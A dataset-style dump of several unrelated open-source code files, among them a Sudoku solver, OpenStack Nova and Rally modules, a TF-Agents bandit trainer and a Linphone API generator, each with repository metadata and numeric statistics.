new_hamming.add(i * 3)
new_hamming.add(i * 5)
# merge new number into hamming set
hamming = hamming.union(new_hamming)
hamming = sorted(list(hamming))
return hamming[n - 1]
print(hamming(970))
# hamming(968) should be 41943040
# hamming(969) should be 41990400
# hamming(970) should be 42187500
| 24.086957
| 44
| 0.592058
| 77
| 554
| 4.194805
| 0.454545
| 0.154799
| 0.120743
| 0.130031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 0.296029
| 554
| 22
| 45
| 25.181818
| 0.712821
| 0.290614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.153846
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865bbf72a785e72699020e27186c8a54194bf255
| 1,615
|
py
|
Python
|
examples/python/test_as2.py
|
sloriot/cgal-swig-bindings
|
c9c5afdf64fa0c52f9c3785173159167ab2b3163
|
[
"BSL-1.0"
] | null | null | null |
examples/python/test_as2.py
|
sloriot/cgal-swig-bindings
|
c9c5afdf64fa0c52f9c3785173159167ab2b3163
|
[
"BSL-1.0"
] | null | null | null |
examples/python/test_as2.py
|
sloriot/cgal-swig-bindings
|
c9c5afdf64fa0c52f9c3785173159167ab2b3163
|
[
"BSL-1.0"
] | null | null | null |
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Kernel import Weighted_point_2
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3
lst = []
lst.append(Point_2(0, 0))
lst.append(Point_2(0, 4))
lst.append(Point_2(44, 0))
lst.append(Point_2(44, 5))
lst.append(Point_2(444, 51))
lst.append(Point_2(14, 1))
t = Alpha_shape_2(lst, 0, GENERAL)
t2 = Alpha_shape_2(lst, 0)
t.clear()
t.make_alpha_shape(lst)
for d in t.alpha():
print(d)
for v in t.finite_vertices():
type = t.classify(v)
print(v.get_range()[0])
if type == INTERIOR:
print("INTERIOR")
elif type == SINGULAR:
print("SINGULAR")
elif type == REGULAR:
print("REGULAR")
elif type == EXTERIOR:
print("EXTERIOR")
for f in t.finite_faces():
i = f.get_ranges(0)
print(i.first)
print(i.second)
print(i.third)
was = Weighted_alpha_shape_2()
lst_wp = []
lst_wp.append(Weighted_point_2(Point_2(0, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(0, 4), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 5), 1))
lst_wp.append(Weighted_point_2(Point_2(444, 51), 1))
lst_wp.append(Weighted_point_2(Point_2(14, 1), 1))
was.make_alpha_shape(lst_wp)
| 26.47541
| 82
| 0.740557
| 293
| 1,615
| 3.764505
| 0.187713
| 0.108794
| 0.149592
| 0.107888
| 0.595648
| 0.453309
| 0.453309
| 0.453309
| 0.446963
| 0.359021
| 0
| 0.059626
| 0.138081
| 1,615
| 60
| 83
| 26.916667
| 0.732759
| 0
| 0
| 0
| 0
| 0
| 0.019195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.191489
| 0
| 0.191489
| 0.191489
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865fa048751d6ad0bc743581cad5200b3338324d
| 2,192
|
py
|
Python
|
indico/web/forms/fields/protection.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 1
|
2018-11-12T21:29:26.000Z
|
2018-11-12T21:29:26.000Z
|
indico/web/forms/fields/protection.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 9
|
2020-09-08T09:25:57.000Z
|
2022-01-13T02:59:05.000Z
|
indico/web/forms/fields/protection.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 3
|
2020-07-20T09:09:44.000Z
|
2020-10-19T00:29:49.000Z
|
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import absolute_import, unicode_literals
from flask import render_template
from markupsafe import Markup
from indico.core.db import db
from indico.core.db.sqlalchemy.protection import ProtectionMode
from indico.util.i18n import _
from indico.web.forms.fields import IndicoEnumRadioField
from indico.web.forms.widgets import JinjaWidget
class IndicoProtectionField(IndicoEnumRadioField):
widget = JinjaWidget('forms/protection_widget.html', single_kwargs=True)
radio_widget = JinjaWidget('forms/radio_buttons_widget.html', orientation='horizontal', single_kwargs=True)
def __init__(self, *args, **kwargs):
self.protected_object = kwargs.pop('protected_object')(kwargs['_form'])
get_acl_message_url = kwargs.pop('acl_message_url', None)
self.acl_message_url = get_acl_message_url(kwargs['_form']) if get_acl_message_url else None
self.can_inherit_protection = self.protected_object.protection_parent is not None
if not self.can_inherit_protection:
kwargs['skip'] = {ProtectionMode.inheriting}
super(IndicoProtectionField, self).__init__(*args, enum=ProtectionMode, **kwargs)
def render_protection_message(self):
protected_object = self.get_form().protected_object
if hasattr(protected_object, 'get_non_inheriting_objects'):
non_inheriting_objects = protected_object.get_non_inheriting_objects()
else:
non_inheriting_objects = []
if isinstance(protected_object.protection_parent, db.m.Event):
parent_type = _('Event')
elif isinstance(protected_object.protection_parent, db.m.Category):
parent_type = _('Category')
else:
parent_type = _('Session')
rv = render_template('_protection_info.html', field=self, protected_object=protected_object,
parent_type=parent_type, non_inheriting_objects=non_inheriting_objects)
return Markup(rv)
| 45.666667
| 111
| 0.734945
| 268
| 2,192
| 5.701493
| 0.373134
| 0.107984
| 0.078534
| 0.031414
| 0.175393
| 0.146597
| 0.057592
| 0
| 0
| 0
| 0
| 0.005571
| 0.181113
| 2,192
| 47
| 112
| 46.638298
| 0.845682
| 0.091241
| 0
| 0.058824
| 0
| 0
| 0.091184
| 0.053401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866094a72b6fdcd5bf322c232acd28e290c2c5aa
| 3,096
|
py
|
Python
|
solver.py
|
jacobchh/Sudoku-Solver
|
946a954e8eda234760872c55fcd2354dc0a8a4f9
|
[
"Apache-2.0"
] | 1
|
2020-08-04T05:11:05.000Z
|
2020-08-04T05:11:05.000Z
|
solver.py
|
jacobchh/Sudoku-Solver
|
946a954e8eda234760872c55fcd2354dc0a8a4f9
|
[
"Apache-2.0"
] | null | null | null |
solver.py
|
jacobchh/Sudoku-Solver
|
946a954e8eda234760872c55fcd2354dc0a8a4f9
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
board = np.zeros(shape=(9, 9))
count = 0
def solve():
global count
count += 1
if count % 1000 == 0:
print('\rCurrent number of computations made:', count, end='')
freePos = find()
if freePos is None:
return True
i = freePos[0]
j = freePos[1]
for w in range(1, 10):
if possible(w, freePos):
board[i][j] = w
if solve():
return True
board[i][j] = 0
return False
def find():
for i in range(9):
for j in range(9):
if board[i][j] == 0:
return [i, j]
return None
def possible(value, position):
# position = (i, j) tuple
i = position[0]
j = position[1]
# checks row and column for repeat value
if (value in board[:, j]) or (value in board[i]):
return False
# reset to i,j - top left square
i = (i // 3) * 3
j = (j // 3) * 3
# check all squares in square
for n in range(i, i + 3):
for m in range(j, j + 3):
if board[n][m] == value:
return False
return True
def change(position):
# position = (i, j) tuple
i = position[0]
j = position[1]
for w in range(1, 10):
if w not in board[:, j] and w not in board[i]:
board[i][j] = w
return True
return False
def initialize():
print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank")
integerChunk = input("Numbers: ")
pos = 0
for i in range(9):
for j in range(9):
board[i][j] = int(integerChunk[pos])
pos += 1
def displayBoard():
for i in range(3):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
print("- - - - - - - - - - -")
for i in range(3, 6):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
print("- - - - - - - - - - -")
for i in range(6, 9):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
def main():
initialize()
print("Is this the correct board? Press enter to continue or 'q' to exit program.")
displayBoard()
response = input()
if response == "q":
exit()
print("---------------SOLVING---------------\n")
solve()
print("\r\rSOLUTION")
displayBoard()
print("\nTotal number of computations:", count)
if __name__ == "__main__":
main()
| 23.633588
| 105
| 0.440891
| 406
| 3,096
| 3.342365
| 0.238916
| 0.022108
| 0.056743
| 0.029477
| 0.344878
| 0.32056
| 0.32056
| 0.32056
| 0.296242
| 0.296242
| 0
| 0.029963
| 0.396318
| 3,096
| 130
| 106
| 23.815385
| 0.696094
| 0.046835
| 0
| 0.514851
| 0
| 0
| 0.12466
| 0.013247
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069307
| false
| 0
| 0.009901
| 0
| 0.178218
| 0.19802
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8660a9342ead6210c470087662e4e506c3d6349b
| 2,863
|
py
|
Python
|
nova/api/openstack/compute/used_limits.py
|
bopopescu/nova-8
|
768d7cc0a632e1a880f00c5840c1ec8051e161be
|
[
"Apache-2.0"
] | null | null | null |
nova/api/openstack/compute/used_limits.py
|
bopopescu/nova-8
|
768d7cc0a632e1a880f00c5840c1ec8051e161be
|
[
"Apache-2.0"
] | null | null | null |
nova/api/openstack/compute/used_limits.py
|
bopopescu/nova-8
|
768d7cc0a632e1a880f00c5840c1ec8051e161be
|
[
"Apache-2.0"
] | 1
|
2020-07-22T21:09:15.000Z
|
2020-07-22T21:09:15.000Z
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import api_version_request
from nova.api.openstack.api_version_request \
import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.policies import used_limits as ul_policies
from nova import quota
QUOTAS = quota.QUOTAS
class UsedLimitsController(wsgi.Controller):
@staticmethod
def _reserved(req):
try:
return int(req.GET['reserved'])
except (ValueError, KeyError):
return False
@wsgi.extends
@extensions.expected_errors(())
def index(self, req, resp_obj):
context = req.environ['nova.context']
project_id = self._project_id(context, req)
quotas = QUOTAS.get_project_quotas(context, project_id, usages=True)
if api_version_request.is_supported(
req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION):
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalServerGroupsUsed': 'server_groups',
}
else:
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalFloatingIpsUsed': 'floating_ips',
'totalSecurityGroupsUsed': 'security_groups',
'totalServerGroupsUsed': 'server_groups',
}
used_limits = {}
for display_name, key in quota_map.items():
if key in quotas:
reserved = (quotas[key]['reserved']
if self._reserved(req) else 0)
used_limits[display_name] = quotas[key]['in_use'] + reserved
resp_obj.obj['limits']['absolute'].update(used_limits)
def _project_id(self, context, req):
if 'tenant_id' in req.GET:
tenant_id = req.GET.get('tenant_id')
target = {
'project_id': tenant_id,
'user_id': context.user_id
}
context.can(ul_policies.BASE_POLICY_NAME, target)
return tenant_id
return context.project_id
| 35.7875
| 78
| 0.625218
| 321
| 2,863
| 5.395639
| 0.423676
| 0.034642
| 0.025404
| 0.046189
| 0.161663
| 0.116628
| 0.079677
| 0.079677
| 0
| 0
| 0
| 0.00441
| 0.287111
| 2,863
| 79
| 79
| 36.240506
| 0.844194
| 0.204331
| 0
| 0.181818
| 0
| 0
| 0.151502
| 0.02871
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.109091
| 0
| 0.254545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86612e58c1d3c9004b21a40197263a8e6dc182a5
| 7,362
|
py
|
Python
|
tf_agents/bandits/agents/examples/v2/trainer.py
|
howards11/agents
|
8d5627d9b9c3680468a63564c25a4d82fa1befb0
|
[
"Apache-2.0"
] | 3,175
|
2017-09-08T18:28:32.000Z
|
2022-03-31T01:32:22.000Z
|
tf_agents/bandits/agents/examples/v2/trainer.py
|
MFosset/agents
|
756f7bdf493986c25eb585438134f1dbb8045b1b
|
[
"Apache-2.0"
] | 703
|
2017-09-18T05:51:57.000Z
|
2022-03-31T17:37:50.000Z
|
tf_agents/bandits/agents/examples/v2/trainer.py
|
MFosset/agents
|
756f7bdf493986c25eb585438134f1dbb8045b1b
|
[
"Apache-2.0"
] | 844
|
2017-09-08T23:28:57.000Z
|
2022-03-30T09:29:32.000Z
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Generic TF-Agents training function for bandits."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import logging
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.drivers import dynamic_step_driver
from tf_agents.eval import metric_utils
from tf_agents.metrics import tf_metrics
from tf_agents.policies import policy_saver
from tf_agents.replay_buffers import tf_uniform_replay_buffer
tf = tf.compat.v2
AGENT_CHECKPOINT_NAME = 'agent'
STEP_CHECKPOINT_NAME = 'step'
CHECKPOINT_FILE_PREFIX = 'ckpt'
def get_replay_buffer(data_spec,
batch_size,
steps_per_loop):
"""Return a `TFUniformReplayBuffer` for the given `agent`."""
buf = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=data_spec,
batch_size=batch_size,
max_length=steps_per_loop)
return buf
def set_expected_shape(experience, num_steps):
def set_time_dim(input_tensor, steps):
tensor_shape = input_tensor.shape.as_list()
tensor_shape[1] = steps
input_tensor.set_shape(tensor_shape)
tf.nest.map_structure(lambda t: set_time_dim(t, num_steps), experience)
def get_training_loop_fn(driver, replay_buffer, agent, steps):
"""Returns a `tf.function` that runs the driver and training loops.
Args:
driver: an instance of `Driver`.
replay_buffer: an instance of `ReplayBuffer`.
agent: an instance of `TFAgent`.
steps: an integer indicating how many driver steps should be
executed and presented to the trainer during each training loop.
"""
def training_loop():
"""Returns a `tf.function` that runs the training loop."""
driver.run()
batch_size = driver.env.batch_size
dataset = replay_buffer.as_dataset(
sample_batch_size=batch_size,
num_steps=steps,
single_deterministic_pass=True)
experience, unused_info = tf.data.experimental.get_single_element(dataset)
set_expected_shape(experience, steps)
loss_info = agent.train(experience)
replay_buffer.clear()
return loss_info
return training_loop
def restore_and_get_checkpoint_manager(root_dir, agent, metrics, step_metric):
"""Restores from `root_dir` and returns a function that writes checkpoints."""
trackable_objects = {metric.name: metric for metric in metrics}
trackable_objects[AGENT_CHECKPOINT_NAME] = agent
trackable_objects[STEP_CHECKPOINT_NAME] = step_metric
checkpoint = tf.train.Checkpoint(**trackable_objects)
checkpoint_manager = tf.train.CheckpointManager(checkpoint=checkpoint,
directory=root_dir,
max_to_keep=5)
latest = checkpoint_manager.latest_checkpoint
if latest is not None:
logging.info('Restoring checkpoint from %s.', latest)
checkpoint.restore(latest)
logging.info('Successfully restored to step %s.', step_metric.result())
else:
logging.info('Did not find a pre-existing checkpoint. '
'Starting from scratch.')
return checkpoint_manager
def train(root_dir,
agent,
environment,
training_loops,
steps_per_loop,
additional_metrics=(),
training_data_spec_transformation_fn=None):
"""Perform `training_loops` iterations of training.
Checkpoint results.
If one or more baseline_reward_fns are provided, the regret is computed
against each one of them. Here is example baseline_reward_fn:
def baseline_reward_fn(observation, per_action_reward_fns):
rewards = ... # compute reward for each arm
optimal_action_reward = ... # take the maximum reward
return optimal_action_reward
Args:
root_dir: path to the directory where checkpoints and metrics will be
written.
agent: an instance of `TFAgent`.
environment: an instance of `TFEnvironment`.
training_loops: an integer indicating how many training loops should be run.
steps_per_loop: an integer indicating how many driver steps should be
executed and presented to the trainer during each training loop.
additional_metrics: Tuple of metric objects to log, in addition to default
metrics `NumberOfEpisodes`, `AverageReturnMetric`, and
`AverageEpisodeLengthMetric`.
training_data_spec_transformation_fn: Optional function that transforms the
data items before they get to the replay buffer.
"""
# TODO(b/127641485): create evaluation loop with configurable metrics.
if training_data_spec_transformation_fn is None:
data_spec = agent.policy.trajectory_spec
else:
data_spec = training_data_spec_transformation_fn(
agent.policy.trajectory_spec)
replay_buffer = get_replay_buffer(data_spec, environment.batch_size,
steps_per_loop)
# `step_metric` records the number of individual rounds of bandit interaction;
# that is, (number of trajectories) * batch_size.
step_metric = tf_metrics.EnvironmentSteps()
metrics = [
tf_metrics.NumberOfEpisodes(),
tf_metrics.AverageEpisodeLengthMetric(batch_size=environment.batch_size)
] + list(additional_metrics)
if isinstance(environment.reward_spec(), dict):
metrics += [tf_metrics.AverageReturnMultiMetric(
reward_spec=environment.reward_spec(),
batch_size=environment.batch_size)]
else:
metrics += [
tf_metrics.AverageReturnMetric(batch_size=environment.batch_size)]
if training_data_spec_transformation_fn is not None:
add_batch_fn = lambda data: replay_buffer.add_batch( # pylint: disable=g-long-lambda
training_data_spec_transformation_fn(data))
else:
add_batch_fn = replay_buffer.add_batch
observers = [add_batch_fn, step_metric] + metrics
driver = dynamic_step_driver.DynamicStepDriver(
env=environment,
policy=agent.collect_policy,
num_steps=steps_per_loop * environment.batch_size,
observers=observers)
training_loop = get_training_loop_fn(
driver, replay_buffer, agent, steps_per_loop)
checkpoint_manager = restore_and_get_checkpoint_manager(
root_dir, agent, metrics, step_metric)
train_step_counter = tf.compat.v1.train.get_or_create_global_step()
saver = policy_saver.PolicySaver(agent.policy, train_step=train_step_counter)
summary_writer = tf.summary.create_file_writer(root_dir)
summary_writer.set_as_default()
for i in range(training_loops):
training_loop()
metric_utils.log_metrics(metrics)
for metric in metrics:
metric.tf_summaries(train_step=step_metric.result())
checkpoint_manager.save()
if i % 100 == 0:
saver.save(os.path.join(root_dir, 'policy_%d' % step_metric.result()))
| 37.948454
| 89
| 0.740424
| 966
| 7,362
| 5.380952
| 0.291925
| 0.027703
| 0.01616
| 0.034629
| 0.175644
| 0.103117
| 0.103117
| 0.078107
| 0.078107
| 0.060793
| 0
| 0.004341
| 0.186362
| 7,362
| 193
| 90
| 38.145078
| 0.863439
| 0.338631
| 0
| 0.035088
| 0
| 0
| 0.030659
| 0
| 0
| 0
| 0
| 0.005181
| 0
| 1
| 0.061404
| false
| 0.008772
| 0.096491
| 0
| 0.192982
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86614dcad65e20388a5967a40083bdb556db6db0
| 2,469
|
py
|
Python
|
rally_openstack/cfg/manila.py
|
RSE-Cambridge/rally-openstack
|
32bbc091bbce1db625a2fc22da28b32718befa13
|
[
"Apache-2.0"
] | null | null | null |
rally_openstack/cfg/manila.py
|
RSE-Cambridge/rally-openstack
|
32bbc091bbce1db625a2fc22da28b32718befa13
|
[
"Apache-2.0"
] | null | null | null |
rally_openstack/cfg/manila.py
|
RSE-Cambridge/rally-openstack
|
32bbc091bbce1db625a2fc22da28b32718befa13
|
[
"Apache-2.0"
] | 1
|
2018-12-10T12:31:27.000Z
|
2018-12-10T12:31:27.000Z
|
# Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally.common import cfg
OPTS = {"openstack": [
cfg.FloatOpt(
"manila_share_create_prepoll_delay",
default=2.0,
deprecated_group="benchmark",
help="Delay between creating Manila share and polling for its "
"status."),
cfg.FloatOpt(
"manila_share_create_timeout",
default=300.0,
deprecated_group="benchmark",
help="Timeout for Manila share creation."),
cfg.FloatOpt(
"manila_share_create_poll_interval",
default=3.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila share "
"creation."),
cfg.FloatOpt(
"manila_share_delete_timeout",
default=180.0,
deprecated_group="benchmark",
help="Timeout for Manila share deletion."),
cfg.FloatOpt(
"manila_share_delete_poll_interval",
default=2.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila share "
"deletion."),
cfg.FloatOpt(
"manila_access_create_timeout",
default=300.0,
deprecated_group="benchmark",
help="Timeout for Manila access creation."),
cfg.FloatOpt(
"manila_access_create_poll_interval",
default=3.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila access "
"creation."),
cfg.FloatOpt(
"manila_access_delete_timeout",
default=180.0,
deprecated_group="benchmark",
help="Timeout for Manila access deletion."),
cfg.FloatOpt(
"manila_access_delete_poll_interval",
default=2.0,
deprecated_group="benchmark",
help="Interval between checks when waiting for Manila access "
"deletion."),
]}
| 35.271429
| 78
| 0.651681
| 288
| 2,469
| 5.444444
| 0.354167
| 0.070153
| 0.097577
| 0.143495
| 0.638393
| 0.579719
| 0.579719
| 0.524235
| 0.446429
| 0.432398
| 0
| 0.018569
| 0.258404
| 2,469
| 69
| 79
| 35.782609
| 0.837794
| 0.243013
| 0
| 0.660377
| 0
| 0
| 0.443366
| 0.149407
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86624e00bb7b419aff83121a582546742f805433
| 571
|
py
|
Python
|
app/backend/app/crud/crud_register_invoice.py
|
matayoos/invoice-scrapper
|
d36c944c10714e61d304693d0fce28769d2a746a
|
[
"MIT"
] | null | null | null |
app/backend/app/crud/crud_register_invoice.py
|
matayoos/invoice-scrapper
|
d36c944c10714e61d304693d0fce28769d2a746a
|
[
"MIT"
] | null | null | null |
app/backend/app/crud/crud_register_invoice.py
|
matayoos/invoice-scrapper
|
d36c944c10714e61d304693d0fce28769d2a746a
|
[
"MIT"
] | null | null | null |
from sqlalchemy.orm.session import Session
from app import crud
from .utils import insert, get_content
def register_invoice(db: Session, url: str):
content = get_content.get_invoice_info(url)
grocery_store_id = insert.insert_grocery_store_info(
db, obj_in=content["grocery_store"]
)
invoice_id = insert.insert_invoice_info(
db, obj_in=content["invoice"], grocery_store_id=grocery_store_id
)
insert.insert_invoice_items(db, content["items"], grocery_store_id, invoice_id)
return crud.get_invoice_by_id(db, id=invoice_id)
| 27.190476
| 83
| 0.749562
| 83
| 571
| 4.807229
| 0.313253
| 0.180451
| 0.140351
| 0.100251
| 0.220551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161121
| 571
| 20
| 84
| 28.55
| 0.832985
| 0
| 0
| 0
| 0
| 0
| 0.043783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.230769
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8666c057450744d94668536ee8580d907346f31a
| 28,602
|
py
|
Python
|
tools/genapixml.py
|
garronej/linphone
|
f61a337f5363b991d6e866a6aa7d303658c04073
|
[
"BSD-2-Clause"
] | null | null | null |
tools/genapixml.py
|
garronej/linphone
|
f61a337f5363b991d6e866a6aa7d303658c04073
|
[
"BSD-2-Clause"
] | null | null | null |
tools/genapixml.py
|
garronej/linphone
|
f61a337f5363b991d6e866a6aa7d303658c04073
|
[
"BSD-2-Clause"
] | 1
|
2021-03-17T10:04:06.000Z
|
2021-03-17T10:04:06.000Z
|
#!/usr/bin/python
# Copyright (C) 2014 Belledonne Communications SARL
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse
import os
import six
import string
import sys
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom
import metadoc
class CObject:
def __init__(self, name):
self.name = name.strip()
self.briefDescription = ''
self.detailedDescription = None
self.deprecated = False
self.briefDoc = None
class CEnumValue(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.value = None
class CEnum(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.values = []
self.associatedTypedef = None
def addValue(self, value):
self.values.append(value)
class CStructMember(CObject):
def __init__(self, name, t):
CObject.__init__(self, name)
self.ctype = t.strip()
class CStruct(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.members = []
self.associatedTypedef = None
def addMember(self, member):
self.members.append(member)
class CTypedef(CObject):
def __init__(self, name, definition):
CObject.__init__(self, name)
self.definition = definition.strip()
class CArgument(CObject):
def __init__(self, t, name = '', enums = [], structs = []):
CObject.__init__(self, name)
self.description = None
self.containedType = None
keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ]
fullySplittedType = []
splittedType = t.strip().split(' ')
for s in splittedType:
if s.startswith('*'):
fullySplittedType.append('*')
if len(s) > 1:
fullySplittedType.append(s[1:])
elif s.endswith('*'):
fullySplittedType.append(s[:-1])
fullySplittedType.append('*')
else:
fullySplittedType.append(s)
if 'MS2_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('MS2_DEPRECATED')
elif 'LINPHONE_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('LINPHONE_DEPRECATED')
isStruct = False
isEnum = False
self.ctype = 'int' # Default to int so that the result is correct eg. for 'unsigned short'
for s in fullySplittedType:
if not s in keywords:
self.ctype = s
if s == 'struct':
isStruct = True
if s == 'enum':
isEnum = True
if isStruct:
for st in structs:
if st.associatedTypedef is not None:
self.ctype = st.associatedTypedef.name
elif isEnum:
for e in enums:
if e.associatedTypedef is not None:
self.ctype = e.associatedTypedef.name
if self.ctype == 'int' and 'int' not in fullySplittedType:
if fullySplittedType[-1] == '*':
fullySplittedType.insert(-1, 'int')
else:
fullySplittedType.append('int')
self.completeType = ' '.join(fullySplittedType)
def __str__(self):
return self.completeType + " " + self.name
class CArgumentsList:
